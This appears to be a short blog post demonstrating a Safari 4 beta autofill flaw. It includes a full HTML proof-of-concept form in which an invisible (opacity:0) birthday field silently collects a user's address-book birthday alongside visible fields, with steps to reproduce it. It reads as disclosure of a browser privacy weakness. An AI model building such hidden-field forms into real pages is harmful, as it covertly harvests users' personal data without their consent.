So I quickly came up with an evil idea. Would it be possible to abuse that feature to automatically collect birthdays from users on say a signup form?
And yes, it’s possible. Save the following HTML on your disk:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Settings - Profile - brightkite.com </title> </head> <body> <form action="http://localhost/" method="get"> <label for="fullname">Full name</label> <input id="fullname" name="fullname" /> <input type="submit" /> <input id="street" name="street" /> <input id="dob" name="dob" style="opacity:0" /> </form> </body> </html>
It defines a form with the three fields full name, street and birthday. The birthday field is hidden – so the user has no idea that it will be submitted as well. The street field is just in there for easy checking if the autocompletion is working.
Then open the form in Safari (I tried on Version 4 Public Beta 5528.16), enter your full name in the first field and use the tab key to activate the submit button. If everything worked, you’ll see the street field autofilled as you’d expect. But when you submit, the birthday is submitted as well – if you have it stored in your address book.